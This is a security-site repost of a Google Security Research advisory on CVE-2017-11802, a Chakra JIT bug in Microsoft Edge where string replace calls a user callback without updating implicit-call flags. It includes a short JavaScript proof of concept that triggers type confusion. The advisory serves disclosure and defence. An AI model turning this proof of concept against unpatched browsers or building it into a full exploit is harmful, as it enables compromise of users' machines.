首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Edge Chakra JIT Failed RegexHelper::StringReplace Call
来源:Google Security Research 作者:lokihardt 发布时间:2017-10-16  
 Microsoft Edge: Chakra: JIT: RegexHelper::StringReplace must call the callback function with updating ImplicitCallFlags 

CVE-2017-11802


The "String.prototype.replace" method can be inlined in the JIT process. So in the method, all the calls which may break the JIT assumptions must be invoked with updating "ImplicitCallFlags". But "RegexHelper::StringReplace" calls the replace function without updating the flag. Therefore it fails to detect if a user function was called.


The PoC shows that it can result in type confusion.

PoC:
function main() {
    let arr = [1.1, 1.1, 1.1, 1.1, 1.1];
    function opt(f) {
        arr[0] = 1.1;
        arr[1] = 2.3023e-320 + parseInt('a'.replace('a', f));
        arr[2] = 1.1;
        arr[3] = 1.1;
    }

    let <a href="https://crrev.com/0" title="" class="" rel="nofollow">r0</a> = () => '0';
    for (var i = 0; i < 0x1000; i++)
        opt(<a href="https://crrev.com/0" title="" class="" rel="nofollow">r0</a>);

    opt(() => {
        arr[0] = {};
        return '0';
    });

    print(arr[1]);
}

main();


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.




Found by: lokihardt


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Edge Chakra JIT Inco
·Microsoft Edge Chakra StackScr
·Opentext Documentum Content Se
·Webmin 1.850 SSRF / CSRF / Cro
·Opentext Documentum Content Se
·Micro Focus VisiBroker C++ 8.5
·Opentext Documentum Content Se
·Microsoft Windows - 'nt!NtQuer
·Opentext Documentum Content Se
·Linux Kernel - 'AF_PACKET' Use
·Sync Breeze Enterprise 10.1.16
·Mozilla Firefox < 55 - Denial
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved